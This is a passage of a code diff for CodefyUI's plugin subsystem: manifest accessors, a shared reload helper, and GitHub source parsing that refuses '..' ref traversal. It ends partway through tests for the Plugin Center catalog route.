+    :func:`validate_manifest` has already refused those loudly; this is the
+    accessor a reader (``plugin list``, an inspect route) uses on a manifest
+    nobody promised was valid, and there it must describe rather than raise.
+    """
+    security = manifest.get("security")
+    if not isinstance(security, dict):
+        return []
+    value = security.get("allowed_modules")
+    if not isinstance(value, list):
+        return []
+    return [item for item in value if isinstance(item, str)]
+
+
+def manifest_python_deps(manifest: dict[str, Any]) -> dict[str, str]:
+    """The ``[python_deps]`` table -- ``{name: version constraint}``, ``{}``
+    when the manifest declares none.
+
+    Returned exactly as written, NOT vetted: a name or a constraint from here
+    is still an untrusted string that only ``_build_dep_spec`` may turn into
+    something ``uv pip install`` sees. Filtering the odd entries out here
+    would be worse than useless -- it would silently drop the malformed spec
+    that the installer currently refuses by name.
+    """
+    deps = manifest.get("python_deps")
+    return deps if isinstance(deps, dict) else {}
+
+
+def manifest_has_frontend(manifest: dict[str, Any]) -> bool:
+    """Whether this plugin ships browser code (``[frontend].entry``).
+
+    Worth its own question because the answer drives a warning rather than a
+    file operation: frontend code runs in the user's browser inside the
+    editor with full editor access, which is a different trust decision from
+    anything the AST gate covers.
+    """
+    fe = manifest.get("frontend")
+    return isinstance(fe, dict) and isinstance(fe.get("entry"), str) and bool(fe.get("entry"))

--- a/backend/app/core/plugins/manifest.py
+++ b/backend/app/core/plugins/manifest.py
@@ -54,6 +54,18 @@ REPO_SEGMENT = r"[\w.-]"
 #: ``owner/repo``, in the characters GitHub allows in either half.
 REPO_RE = re.compile(rf"^{REPO_SEGMENT}+/{REPO_SEGMENT}+$")
 
+#: The characters a git ref may use, as a fragment for the same reason
+#: :data:`REPO_SEGMENT` is one: the two source patterns capture the ref in
+#: different positions and used to spell its grammar twice, once as
+#: ``[\w./-]+`` and once as ``.+``. The loose half accepted a ref with a
+#: space or a control character in it -- which reaches ``http.client`` as an
+#: invalid URL -- and one with ``..`` in it, which walks up the URL path the
+#: ref is interpolated into. A slash is in the set because ``feat/x`` is an
+#: ordinary branch name; the ``..`` refusal is separate (see
+#: :func:`~app.core.plugins.sources.parse_source`) because no character class
+#: can express "not this sequence".
+REF_SEGMENT = r"[\w./-]"
+
 #: The one ``[plugin].schema_version`` this build knows how to install.
 SUPPORTED_SCHEMA = 1
 

--- a/backend/app/core/plugins/manifest.py
+++ b/backend/app/core/plugins/manifest.py
@@ -44,6 +44,16 @@ else:
 #: component all at once, so it is deliberately narrower than any of them.
 PLUGIN_ID_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$")
 
+#: The characters one half of ``owner/repo`` may use, as a fragment rather
+#: than a pattern: the catalog validates a whole ``owner/repo`` string while
+#: the source parser has to capture the halves separately, and the two used
+#: to spell the same rule twice. One of them drifting is a source this build
+#: accepts and refuses depending on which door it came in.
+REPO_SEGMENT = r"[\w.-]"
+
+#: ``owner/repo``, in the characters GitHub allows in either half.
+REPO_RE = re.compile(rf"^{REPO_SEGMENT}+/{REPO_SEGMENT}+$")
+
 #: The one ``[plugin].schema_version`` this build knows how to install.
 SUPPORTED_SCHEMA = 1
 

--- a/backend/app/core/plugins/reload.py
+++ b/backend/app/core/plugins/reload.py
@@ -1,0 +1,46 @@
+"""One re-discovery call, for every place that has to trigger one.
+
+``rediscover_all`` takes seven arguments and every caller passes the same
+seven: the process-wide node and preset registries, the three directories
+``settings`` names, and the two plugin roots. That full spelling was written
+out four times -- in ``POST /api/nodes/reload``, ``POST /api/plugins/reload``,
+the plugin enable/disable handler and the custom-node upload/delete handler --
+which made "reload everything" a nine-line quotation rather than a call, and
+made a fifth caller a copy-paste job. Worse, the copies were free to drift:
+a route that forgot ``presets_dir`` would clear the presets and never put
+them back, and nothing but a reader comparing all four would notice.
+
+So the arguments are fixed here, once, and the routes ask for the ANSWER.
+The plugin install and uninstall routes of the Plugin Center are that fifth
+and sixth caller; they get the same five counts without repeating a line.
+
+The settings and the plugin roots are read at CALL time, not at import time:
+a test redirects ``settings.CUSTOM_NODES_DIR`` or the user-data root for the
+duration of one test, and a re-discovery run inside it has to see the
+redirect rather than whatever was true when this module was first imported.
+"""
+
+from __future__ import annotations
+
+from app.config import settings
+from app.core import plugin_loader
+from app.core.node_registry import registry
+from app.core.preset_registry import preset_registry
+
+
+def rediscover_now() -> dict[str, int]:
+    """Clear and re-discover every node and preset source.
+
+    Returns ``{"builtin", "custom", "plugins", "presets", "total"}`` -- the
+    counts ``POST /api/nodes/reload`` and ``POST /api/plugins/reload`` return
+    verbatim -- and bumps the reload generation the editor polls.
+    """
+    return plugin_loader.rediscover_all(
+        registry,
+        preset_registry,
+        nodes_dir=settings.NODES_DIR,
+        custom_nodes_dir=settings.CUSTOM_NODES_DIR,
+        presets_dir=settings.PRESETS_DIR,
+        builtin_root=plugin_loader.plugins_builtin_root(),
+        user_root=plugin_loader.plugins_user_root(),
+    )

--- a/backend/app/core/plugins/sources.py
+++ b/backend/app/core/plugins/sources.py
@@ -1,0 +1,97 @@
+"""What the user typed, turned into something the installer can act on.
+
+One field accepts four shapes -- ``deep``, ``alice/extras``,
+``alice/extras@v1.2.3``, ``https://github.com/alice/extras`` -- because a
+person who has a plugin in mind should not have to know which of the two
+install paths it goes down. Sorting that out is this module's whole job, and
+it is deliberately the only place that knows the answer: the CLI and the
+routes both get the same verdict on the same string.
+
+The catalog wins over the GitHub patterns, and it is checked first for a
+reason: ``deep`` is a legal repository name, so a bare word that IS a catalog
+id has to resolve to the pack that ships here rather than to whatever
+``deep`` happens to be on GitHub.
+
+A refusal is structured (see :mod:`.errors`), never prose. There are two, and
+the difference matters to the person reading it: a bare word can only ever
+have been meant as a catalog name, so the answer is "your catalog does not
+have that one, here is what it does have"; anything else needs the general
+"here are the shapes this field takes". Which sentence says that, and in
+which language, belongs to the caller.
+"""
+
+from __future__ import annotations
+
+import re
+from pathlib import Path
+from typing import Any, Literal, NamedTuple
+
+from . import catalog as catalog_module
+from .errors import UnknownCatalogName, UnparseableSource
+
+# Accepts owner/repo or owner/repo@ref; owner/repo names are GitHub-permissible.
+_GITHUB_SHORT = re.compile(r"^([\w.-]+)/([\w.-]+?)(?:@([\w./-]+))?$")
+_GITHUB_URL = re.compile(
+    r"^https?://(?:www\.)?github\.com/([\w.-]+)/([\w.-]+?)(?:\.git)?/?(?:@(.+))?$"
+)
+# One word, no slash and no scheme: the only thing it can have been meant as is
+# a catalog name. See UnknownCatalogName for why that deserves its own error.
+_BARE_NAME = re.compile(r"^[A-Za-z0-9][\w.-]*$")
+
+
+class ParsedSource(NamedTuple):
+    """Where a plugin is to come from.
+
+    ``name_or_owner`` carries the plugin id for a catalog source and the
+    GitHub owner for a repository one -- one field because the two are
+    mutually exclusive and the ``kind`` says which is meant. ``repo`` and
+    ``ref`` are empty strings for a catalog source, and ``ref`` is empty for a
+    repository whose default branch is wanted.
+    """
+
+    kind: Literal["catalog", "github"]
+    name_or_owner: str
+    repo: str
+    ref: str
+
+
+def parse_source(
+    spec: str,
+    *,
+    catalog: dict[str, Any] | None = None,
+    catalog_path: Path | None = None,
+) -> ParsedSource:
+    """Resolve *spec* to a :class:`ParsedSource`, or raise a
+    :class:`~.errors.SourceError`.
+
+    Catalog lookup is case-insensitive; the id in the result is lower-cased,
+    because that is the directory name the pack lives under.
+
+    *catalog* and *catalog_path* override what is read from disk. They exist
+    for ``scripts/plugins.py``, whose tests fake the catalog by patching the
+    CLI's own ``load_catalog``: without them this would reach past that patch
+    and answer from the real ``registry.json``.
+    """
+    plugins = (
+        catalog_module.load_catalog() if catalog is None else catalog
+    ).get("plugins", {})
+
+    if spec.lower() in plugins:
+        return ParsedSource("catalog", spec.lower(), "", "")
+
+    m = _GITHUB_URL.match(spec)
+    if m:
+        return ParsedSource("github", m.group(1), m.group(2), m.group(3) or "")
+
+    m = _GITHUB_SHORT.match(spec)
+    if m:
+        return ParsedSource("github", m.group(1), m.group(2), m.group(3) or "")
+
+    if _BARE_NAME.match(spec):
+        raise UnknownCatalogName(
+            spec,
+            sorted(plugins),
+            catalog_module.catalog_path() if catalog_path is None else catalog_path,
+        )
+
+    raise UnparseableSource(spec)

--- a/backend/app/core/plugins/sources.py
+++ b/backend/app/core/plugins/sources.py
@@ -23,16 +23,20 @@ which language, belongs to the caller.
 from __future__ import annotations
 
 import re
-from pathlib import Path
 from typing import Any, Literal, NamedTuple
 
 from . import catalog as catalog_module
 from .errors import UnknownCatalogName, UnparseableSource
+from .manifest import REPO_SEGMENT
 
-# Accepts owner/repo or owner/repo@ref; owner/repo names are GitHub-permissible.
-_GITHUB_SHORT = re.compile(r"^([\w.-]+)/([\w.-]+?)(?:@([\w./-]+))?$")
+# Accepts owner/repo or owner/repo@ref, in the same characters the catalog
+# accepts in an entry's ``repo`` -- one shape rule, spelled once in
+# :data:`~app.core.plugins.manifest.REPO_SEGMENT`, because a source this build
+# takes from the catalog and refuses when typed is indefensible either way.
+_GITHUB_SHORT = re.compile(rf"^({REPO_SEGMENT}+)/({REPO_SEGMENT}+?)(?:@([\w./-]+))?$")
 _GITHUB_URL = re.compile(
-    r"^https?://(?:www\.)?github\.com/([\w.-]+)/([\w.-]+?)(?:\.git)?/?(?:@(.+))?$"
+    rf"^https?://(?:www\.)?github\.com/({REPO_SEGMENT}+)/({REPO_SEGMENT}+?)"
+    r"(?:\.git)?/?(?:@(.+))?$"
 )
 # One word, no slash and no scheme: the only thing it can have been meant as is
 # a catalog name. See UnknownCatalogName for why that deserves its own error.
@@ -59,7 +63,6 @@ def parse_source(
     spec: str,
     *,
     catalog: dict[str, Any] | None = None,
-    catalog_path: Path | None = None,
 ) -> ParsedSource:
     """Resolve *spec* to a :class:`ParsedSource`, or raise a
     :class:`~.errors.SourceError`.
@@ -67,10 +70,10 @@ def parse_source(
     Catalog lookup is case-insensitive; the id in the result is lower-cased,
     because that is the directory name the pack lives under.
 
-    *catalog* and *catalog_path* override what is read from disk. They exist
-    for ``scripts/plugins.py``, whose tests fake the catalog by patching the
-    CLI's own ``load_catalog``: without them this would reach past that patch
-    and answer from the real ``registry.json``.
+    *catalog* overrides what is read from disk. It exists for
+    ``scripts/plugins.py``, whose tests fake the catalog by patching the CLI's
+    own ``load_catalog``: without it this would reach past that patch and
+    answer from the real ``registry.json``.
     """
     data = catalog_module.load_catalog() if catalog is None else catalog
     plugins = data.get("plugins", {})
@@ -87,10 +90,6 @@ def parse_source(
         return ParsedSource("github", m.group(1), m.group(2), m.group(3) or "")
 
     if _BARE_NAME.match(spec):
-        raise UnknownCatalogName(
-            spec,
-            sorted(plugins),
-            catalog_module.catalog_path() if catalog_path is None else catalog_path,
-        )
+        raise UnknownCatalogName(spec, sorted(plugins), catalog_module.catalog_path())
 
     raise UnparseableSource(spec)

--- a/backend/app/core/plugins/sources.py
+++ b/backend/app/core/plugins/sources.py
@@ -27,16 +27,21 @@ from typing import Any, Literal, NamedTuple
 
 from . import catalog as catalog_module
 from .errors import UnknownCatalogName, UnparseableSource
-from .manifest import REPO_SEGMENT
+from .manifest import REF_SEGMENT, REPO_SEGMENT
 
 # Accepts owner/repo or owner/repo@ref, in the same characters the catalog
 # accepts in an entry's ``repo`` -- one shape rule, spelled once in
 # :data:`~app.core.plugins.manifest.REPO_SEGMENT`, because a source this build
 # takes from the catalog and refuses when typed is indefensible either way.
-_GITHUB_SHORT = re.compile(rf"^({REPO_SEGMENT}+)/({REPO_SEGMENT}+?)(?:@([\w./-]+))?$")
+# The ref half is :data:`~app.core.plugins.manifest.REF_SEGMENT` for the same
+# reason: the URL form used to end in ``(?:@(.+))?``, so the same ref was a
+# legal source through a URL and an illegal one through the short form.
+_GITHUB_SHORT = re.compile(
+    rf"^({REPO_SEGMENT}+)/({REPO_SEGMENT}+?)(?:@({REF_SEGMENT}+))?$"
+)
 _GITHUB_URL = re.compile(
     rf"^https?://(?:www\.)?github\.com/({REPO_SEGMENT}+)/({REPO_SEGMENT}+?)"
-    r"(?:\.git)?/?(?:@(.+))?$"
+    rf"(?:\.git)?/?(?:@({REF_SEGMENT}+))?$"
 )
 # One word, no slash and no scheme: the only thing it can have been meant as is
 # a catalog name. See UnknownCatalogName for why that deserves its own error.
@@ -79,6 +84,19 @@ def parse_github_url(url: str) -> tuple[str, str] | None:
     return (m.group(1), m.group(2)) if m else None
 
 
+def _walks_up(ref: str) -> bool:
+    """Does *ref* contain ``..`` as a PATH SEGMENT?
+
+    A ref is interpolated into URL paths --
+    ``api.github.com/repos/<o>/<r>/commits/<ref>`` and, at the resolved sha,
+    ``raw.githubusercontent.com/...`` -- so a ``..`` segment climbs out of
+    the endpoint the caller meant to ask about. Segment-wise rather than a
+    substring test, because ``v1..2`` is a legal tag name and only ``..``
+    standing alone between slashes is the traversal.
+    """
+    return ".." in ref.split("/")
+
+
 def parse_source(
     spec: str,
     *,
@@ -94,6 +112,10 @@ def parse_source(
     ``scripts/plugins.py``, whose tests fake the catalog by patching the CLI's
     own ``load_catalog``: without it this would reach past that patch and
     answer from the real ``registry.json``.
+
+    A ref that walks up (see :func:`_walks_up`) is unparseable rather than
+    passed on, because there is nothing a caller could usefully do with it
+    except refuse it later, further from the string that was typed.
     """
     data = catalog_module.load_catalog() if catalog is None else catalog
     plugins = data.get("plugins", {})
@@ -101,13 +123,12 @@ def parse_source(
     if spec.lower() in plugins:
         return ParsedSource("catalog", spec.lower(), "", "")
 
-    m = _GITHUB_URL.match(spec)
+    m = _GITHUB_URL.match(spec) or _GITHUB_SHORT.match(spec)
     if m:
-        return ParsedSource("github", m.group(1), m.group(2), m.group(3) or "")
-
-    m = _GITHUB_SHORT.match(spec)
-    if m:
-        return ParsedSource("github", m.group(1), m.group(2), m.group(3) or "")
+        ref = m.group(3) or ""
+        if _walks_up(ref):
+            raise UnparseableSource(spec)
+        return ParsedSource("github", m.group(1), m.group(2), ref)
 
     if _BARE_NAME.match(spec):
         raise UnknownCatalogName(spec, sorted(plugins), catalog_module.catalog_path())

--- a/backend/app/core/plugins/sources.py
+++ b/backend/app/core/plugins/sources.py
@@ -59,6 +59,26 @@ class ParsedSource(NamedTuple):
     ref: str
 
 
+def parse_github_url(url: str) -> tuple[str, str] | None:
+    """``(owner, repo)`` when *url* is a GitHub repository URL, else ``None``.
+
+    The same pattern :func:`parse_source` reaches for, exported because a
+    second reader asks a narrower question -- a lockfile wrote a ``url`` down,
+    and something wants to know which repository it names -- with no catalog
+    lookup, no short form and no refusal to catch.
+
+    The HOST is half of the answer, which is why this exists at all rather
+    than a caller taking the last two path segments:
+    ``https://evil.example.com/CodefyUI/CodefyUI-Plugin-Self-Learning`` ends
+    in the owner and repository of a plugin CodefyUI vouches for, and is not
+    that plugin. Nothing here is lower-cased -- GitHub names are not
+    case-sensitive, but this reports what was recorded and leaves the
+    comparison to the caller.
+    """
+    m = _GITHUB_URL.match(url)
+    return (m.group(1), m.group(2)) if m else None
+
+
 def parse_source(
     spec: str,
     *,

--- a/backend/app/core/plugins/sources.py
+++ b/backend/app/core/plugins/sources.py
@@ -72,9 +72,8 @@ def parse_source(
     CLI's own ``load_catalog``: without them this would reach past that patch
     and answer from the real ``registry.json``.
     """
-    plugins = (
-        catalog_module.load_catalog() if catalog is None else catalog
-    ).get("plugins", {})
+    data = catalog_module.load_catalog() if catalog is None else catalog
+    plugins = data.get("plugins", {})
 
     if spec.lower() in plugins:
         return ParsedSource("catalog", spec.lower(), "", "")

--- a/backend/app/core/runtime.py
+++ b/backend/app/core/runtime.py
@@ -1,28 +1,18 @@
 """Headless CodefyUI runtime bootstrap.
 
-The server, CLI tooling, and exported Python runners all need the same built-in,
-custom, plugin, and preset discovery rules.  Keep the exported runner on the
-existing central ``rediscover_all`` path rather than growing a second partial
-registry bootstrap.
+The server, CLI tooling, and exported Python runners all need the same
+built-in, custom, plugin, and preset discovery rules. Keep the exported
+runner on the existing central re-discovery path -- one call, whose seven
+arguments live in :func:`~app.core.plugins.reload.rediscover_now` -- rather
+than growing a second partial registry bootstrap.
 """
 
 from __future__ import annotations
 
-from ..config import settings
-from .node_registry import registry
-from .plugin_loader import plugins_builtin_root, plugins_user_root, rediscover_all
-from .preset_registry import preset_registry
+from .plugins.reload import rediscover_now
 
 
 def initialize_runtime() -> dict[str, int]:
     """Reset and discover every executable node and preset source."""
 
-    return rediscover_all(
-        registry,
-        preset_registry,
-        nodes_dir=settings.NODES_DIR,
-        custom_nodes_dir=settings.CUSTOM_NODES_DIR,
-        presets_dir=settings.PRESETS_DIR,
-        builtin_root=plugins_builtin_root(),
-        user_root=plugins_user_root(),
-    )
+    return rediscover_now()

--- a/backend/app/main.py
+++ b/backend/app/main.py
@@ -289,19 +289,6 @@ async def lifespan(app: FastAPI):
                 "{ url = \"...\", ref = \"...\", sha = \"...\" }",
                 ", ".join(malformed))
 
-    # Mount each installed plugin's assets/ dir so the frontend can fetch
-    # plugin-shipped CSVs / images at /plugins/<id>/assets/<file>.
-    for plugin_id, plugin_dir in iter_plugin_dirs(
-        plugin_loader.plugins_builtin_root(), plugin_loader.plugins_user_root(), lockfile
-    ):
-        assets = plugin_dir / "assets"
-        if assets.is_dir():
-            app.mount(
-                f"/plugins/{plugin_id}/assets",
-                StaticFiles(directory=assets),
-                name=f"plugin_{plugin_id}_assets",
-            )
-
     # In-memory store for captured per-run node outputs (Teaching Inspector).
     # Bounded by runs AND by bytes (#135) — twenty runs of MNIST batches and
     # twenty runs of 4K feature maps are three orders of magnitude apart.

--- a/backend/app/main.py
+++ b/backend/app/main.py
@@ -86,8 +86,8 @@ from .core.plugin_loader import (
     discover_plugin_nodes,
     iter_plugin_dirs,
     load_lockfile,
-    rediscover_all,
 )
+from .core.plugins.reload import rediscover_now
 from .core.preset_registry import preset_registry
 from .core.run_output_store import RunOutputStore
 from .core.run_service import RunService
@@ -649,17 +649,9 @@ async def auth_bootstrap():
 async def reload_nodes():
     # Built-ins are immutable for the server lifetime — no point in paying
     # the reload tax. Custom nodes and plugins, however, may have been
-    # edited on disk since the last load, so :func:`rediscover_all` force-
-    # reloads them to pick up the changes. Plugin presets are also re-scanned.
-    return rediscover_all(
-        registry,
-        preset_registry,
-        nodes_dir=settings.NODES_DIR,
-        custom_nodes_dir=settings.CUSTOM_NODES_DIR,
-        presets_dir=settings.PRESETS_DIR,
-        builtin_root=plugin_loader.plugins_builtin_root(),
-        user_root=plugin_loader.plugins_user_root(),
-    )
+    # edited on disk since the last load, so the re-discovery force-reloads
+    # them to pick up the changes. Plugin presets are also re-scanned.
+    return rediscover_now()
 
 
 # Production mode: serve the pre-built frontend bundle. Skipped silently in

--- a/backend/tests/test_api_plugin_center.py
+++ b/backend/tests/test_api_plugin_center.py
@@ -1,0 +1,395 @@
+"""``GET /api/plugins/catalog``: the one route the Plugin Center draws from.
+
+The panel merges two documents that do not know about each other -- the
+catalog this build ships and the lockfile this install wrote -- so the tests
+here are mostly about the SEAM. Each state a plugin can be in gets a row of
+its own in one fixture, because the states are defined by which document
+mentions the plugin and how:
+
+    foundations      in both, enabled          -> installed
+    deep             in both, disabled         -> disabled
+    rl               tombstoned, not installed -> removed
+    stats / edu      catalog only, on disk     -> available
+    self-learning    catalog only, a repo      -> available, nothing promised
+    demo-external    lockfile only             -> external
+    ghost-pack       lockfile only, no files   -> missing_files
+
+Three of those are worth saying out loud. ``available`` has to name the
+nodes the pack would add WITHOUT importing them -- that is the whole content
+of the card, and importing is what installing means. ``missing_files`` is
+the state that used to render as a normal installed row whose nodes had all
+silently vanished. And ``removed`` is the #175 tombstone: "you threw this
+away" and "you have never had this" are the two states an Install button
+has to tell apart.
+
+The key list is asserted as an ORDERED list rather than a set: the payload
+is what a TypeScript type will be written against, and a field that quietly
+changes place is a diff worth seeing.
+"""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+
+import pytest
+from fastapi import HTTPException
+from fastapi.routing import APIRoute
+from httpx import ASGITransport, AsyncClient
+
+from app.api import routes_plugins
+from app.config import settings
+from app.core import plugin_loader
+from app.core.node_registry import registry
+from app.core.plugins.listing import catalog_listing
+from app.core.plugins.reload import rediscover_now
+from app.main import app
+
+BASE_URL = f"http://127.0.0.1:{settings.PORT}"
+
+#: Every key in a catalog row, in order. Additive is a decision: a new field
+#: should break this once, on purpose.
+ENTRY_KEYS = [
+    "id", "name", "description", "kind", "official", "status", "source_kind",
+    "source", "repo", "ref", "sha", "url", "homepage", "version",
+    "installed_at", "enabled", "chapters", "lessons", "tags", "nodes",
+    "node_count", "capabilities", "trusted_modules", "python_deps",
+    "has_frontend", "consent_required", "frontend_entry", "job",
+]
+
+TOP_KEYS = {"entries", "active_job", "remote_install_allowed", "generation"}
+
+EXTERNAL_MANIFEST = """\
+[plugin]
+id = "demo-external"
+name = "Demo External"
+version = "2.0.0"
+description = "Installed from a URL nobody put in the catalog."
+schema_version = 1
+
+[python_deps]
+tabulate = ">=0.9"
+"""
+
+
+@pytest.fixture
+def center_lockfile(tmp_path, monkeypatch) -> Path:
+    """A user root holding one plugin of every state the panel can draw."""
+    user_root = tmp_path / "plugins"
+    (user_root / "demo-external").mkdir(parents=True)
+    (user_root / "demo-external" / "cdui.plugin.toml").write_text(
+        EXTERNAL_MANIFEST, encoding="utf-8"
+    )
+    (user_root / "installed.json").write_text(
+        json.dumps({
+            "schema": 1,
+            "plugins": {
+                "foundations": {
+                    "source_kind": "builtin",
+                    "source": "foundations",
+                    "installed_at": "2026-05-30T00:00:00Z",
+                    "manifest": {"id": "foundations", "version": "0.1.0"},
+                    "trusted_modules": [],
+                    "capabilities": [],
+                    "enabled": True,
+                },
+                "deep": {
+                    "source_kind": "builtin",
+                    "source": "deep",
+                    "installed_at": "2026-05-30T00:00:00Z",
+                    "manifest": {"id": "deep", "version": "0.1.0"},
+                    "trusted_modules": [],
+                    "capabilities": [],
+                    "enabled": False,
+                },
+                "demo-external": {
+                    "source_kind": "github_url",
+                    "source": "alice/extras@v1.2.3",
+                    "url": "https://github.com/alice/extras",
+                    "ref": "v1.2.3",
+                    "sha": "0" * 40,
+                    "installed_at": "2026-06-01T00:00:00Z",
+                    "manifest": {"id": "demo-external", "version": "2.0.0"},
+                    "trusted_modules": ["requests"],
+                    "capabilities": ["network"],
+                    "enabled": True,
+                },
+                "ghost-pack": {
+                    "source_kind": "github_url",
+                    "source": "bob/ghost",
+                    "url": "https://github.com/bob/ghost",
+                    "ref": "",
+                    "sha": "1" * 40,
+                    "installed_at": "2026-06-02T00:00:00Z",
+                    "manifest": {"id": "ghost-pack", "name": "Ghost Pack",
+                                 "version": "9.9.9"},
+                    "trusted_modules": [],
+                    "capabilities": [],
+                    "enabled": True,
+                },
+            },
+            "removed": {
+                "rl": {"removed_at": "2026-06-03T00:00:00Z",
+                       "source_kind": "builtin"},
+            },
+        }),
+        encoding="utf-8",
+    )
+    monkeypatch.setattr(plugin_loader, "plugins_user_root", lambda: user_root)
+    return user_root
+
+
+@pytest.fixture
+async def anon_client(center_lockfile):
+    """No session token: what a browser that never bootstrapped would send."""
+    async with AsyncClient(
+        transport=ASGITransport(app=app), base_url=BASE_URL,
+    ) as http:
+        yield http
+
+
+async def rows(client) -> dict[str, dict]:
+    response = await client.get("/api/plugins/catalog")
+    assert response.status_code == 200, response.text
+    return {entry["id"]: entry for entry in response.json()["entries"]}
+
+
+# -- the contract ---------------------------------------------------------
+
+
+async def test_the_catalog_is_an_open_get_with_the_envelope_it_promises(
+        anon_client, monkeypatch):
+    """No token, four top-level keys, and the gate the panel greys out on."""
+    monkeypatch.setattr(settings, "HOST", "127.0.0.1")
+    monkeypatch.setattr(settings, "ALLOW_REMOTE_PLUGIN_INSTALL", False)
+
+    response = await anon_client.get("/api/plugins/catalog")
+    assert response.status_code == 200, response.text
+    body = response.json()
+
+    assert set(body) == TOP_KEYS
+    assert body["active_job"] is None
+    assert body["remote_install_allowed"] is True
+    assert body["generation"] == plugin_loader.reload_generation()
+    assert isinstance(body["entries"], list) and body["entries"]
+
+
+async def test_every_row_has_every_field_in_the_same_order(anon_client):
+    body = (await anon_client.get("/api/plugins/catalog")).json()
+    for entry in body["entries"]:
+        assert list(entry) == ENTRY_KEYS, entry["id"]
+        assert entry["node_count"] == len(entry["nodes"])
+        assert isinstance(entry["python_deps"], dict)
+
+
+async def test_the_catalog_and_the_lockfile_are_merged_once_each(anon_client):
+    """The catalog in the order it is written, then the strangers, sorted."""
+    body = (await anon_client.get("/api/plugins/catalog")).json()
+    ids = [entry["id"] for entry in body["entries"]]
+
+    assert len(ids) == len(set(ids)), "a plugin was listed twice"
+    assert ids[:5] == ["edu", "foundations", "deep", "stats", "rl"]
+    assert ids[-2:] == ["demo-external", "ghost-pack"]
+    assert set(ids[5:-2]) == {"graph-copilot", "self-learning",
+                              "official-template"}
+
+
+# -- one row per state ----------------------------------------------------
+
+
+async def test_an_installed_builtin_reports_the_nodes_it_registered(anon_client):
+    row = (await rows(anon_client))["foundations"]
+    assert row["status"] == "installed"
+    assert row["kind"] == "builtin"
+    assert row["official"] is True
+    assert row["enabled"] is True
+    assert row["source_kind"] == "builtin"
+    assert row["installed_at"] == "2026-05-30T00:00:00Z"
+    assert row["consent_required"] is False
+    # From the live registry -- these are the palette entries, not a guess.
+    assert "Edu-KNN" in row["nodes"]
+    # From the manifest on disk, not from the catalog's prose.
+    assert row["version"] == "0.1.0"
+    assert row["chapters"] == ["C1", "C2"]
+
+
+async def test_a_disabled_builtin_stays_listed_and_says_so(anon_client):
+    row = (await rows(anon_client))["deep"]
+    assert row["status"] == "disabled"
+    assert row["enabled"] is False
+    assert row["installed_at"] == "2026-05-30T00:00:00Z"
+
+
+async def test_an_uninstalled_builtin_names_the_nodes_it_would_add(anon_client):
+    """Read as text off disk: the card has to say what the pack contains
+    before the user agrees to run any of it."""
+    row = (await rows(anon_client))["stats"]
+    assert row["status"] == "available"
+    assert row["official"] is True
+    assert row["enabled"] is False
+    assert row["installed_at"] is None
+    assert row["source_kind"] is None
+    assert row["source"] == "stats"
+    assert row["consent_required"] is False
+    assert {"Stats-Describe", "Stats-Histogram"} <= set(row["nodes"])
+    assert row["tags"] == ["statistics", "chart", "table", "eda",
+                           "confusion-matrix"]
+    # The manifest of a pack that ships in this release is on this disk, so
+    # an available built-in row still answers "what version, what deps".
+    assert row["version"] == "0.1.0"
+
+
+async def test_a_pack_the_user_removed_is_not_merely_absent(anon_client):
+    """#175: "you threw this away" and "you never had this" are two states."""
+    row = (await rows(anon_client))["rl"]
+    assert row["status"] == "removed"
+    assert row["enabled"] is False
+    assert row["installed_at"] is None
+    assert "Edu-PolicyGradient" in row["nodes"]  # still installable
+
+
+async def test_an_available_github_entry_promises_nothing_it_cannot_see(
+        anon_client):
+    """Nothing is fetched to draw a card, so the repository half is empty."""
+    row = (await rows(anon_client))["self-learning"]
+    assert row["kind"] == "github"
+    assert row["official"] is True
+    assert row["status"] == "available"
+    assert row["consent_required"] is True
+    assert row["nodes"] == []
+    assert row["node_count"] == 0
+    assert row["version"] is None
+    assert row["python_deps"] == {}
+    assert row["has_frontend"] is False
+    assert row["repo"] == "CodefyUI/CodefyUI-Plugin-Self-Learning"
+    assert row["url"] == "https://github.com/CodefyUI/CodefyUI-Plugin-Self-Learning"
+    assert row["source"] == "CodefyUI/CodefyUI-Plugin-Self-Learning"
+
+
+async def test_a_plugin_the_catalog_never_heard_of_is_external(anon_client):
+    row = (await rows(anon_client))["demo-external"]
+    assert row["kind"] == "external"
+    assert row["official"] is False
+    assert row["status"] == "installed"
+    assert row["source_kind"] == "github_url"
+    assert row["consent_required"] is True   # it came out of a repository
+    assert row["repo"] == "alice/extras"
+    assert row["url"] == "https://github.com/alice/extras"
+    assert row["ref"] == "v1.2.3"
+    assert row["sha"] == "0" * 40
+    assert row["tags"] == []
+    # The lockfile records what was consented to; the manifest says what the
+    # plugin would install.
+    assert row["capabilities"] == ["network"]
+    assert row["trusted_modules"] == ["requests"]
+    assert row["python_deps"] == {"tabulate": ">=0.9"}
+    assert row["name"] == "Demo External"
+
+
+async def test_an_entry_whose_files_are_gone_says_missing_files(anon_client):
+    """The state that used to draw as a normal row with no nodes in it."""
+    row = (await rows(anon_client))["ghost-pack"]
+    assert row["status"] == "missing_files"
+    assert row["kind"] == "external"
+    assert row["nodes"] == []
+    assert row["frontend_entry"] is None
+    # Nothing can be read off a directory that is not there, so the name and
+    # version come from what the install wrote down.
+    assert row["name"] == "Ghost Pack"
+    assert row["version"] == "9.9.9"
+
+
+async def test_a_running_job_marks_only_its_own_row(center_lockfile):
+    """``installing`` outranks every other status, on that row alone."""
+    job = {"job_id": "j1", "plugin_id": "stats", "kind": "install",
+           "status": "running", "current_step": "deps"}
+    listing = catalog_listing(
+        plugin_loader.load_lockfile(),
+        registry=registry,
+        active_job=job,
+        remote_install_allowed=True,
+        generation=7,
+    )
+    by_id = {entry["id"]: entry for entry in listing["entries"]}
+
+    assert listing["active_job"] == job
+    assert listing["generation"] == 7
+    assert by_id["stats"]["status"] == "installing"
+    assert by_id["stats"]["job"] == {"job_id": "j1", "status": "running",
+                                     "current_step": "deps"}
+    assert by_id["foundations"]["status"] == "installed"
+    assert by_id["foundations"]["job"] is None
+
+
+# -- the router ------------------------------------------------------------
+
+
+def test_every_fixed_path_is_declared_before_the_plugin_id_route():
+    """A pack cannot be called ``catalog``, but the router is not the place
+    to find that out. Starlette matches in registration order, so a fixed
+    path declared after ``/{plugin_id}`` is reachable only by that promise."""
+    paths = [route.path for route in routes_plugins.router.routes
+             if isinstance(route, APIRoute)]
+    assert "/api/plugins/catalog" in paths
+    first_dynamic = paths.index("/api/plugins/{plugin_id}")
+    for index, path in enumerate(paths):
+        if "{" not in path:
+            assert index < first_dynamic, f"{path} is declared too late"
+
+
+# -- the install gate ------------------------------------------------------
+
+
+@pytest.mark.parametrize("host", ["127.0.0.1", "localhost", "::1", "[::1]"])
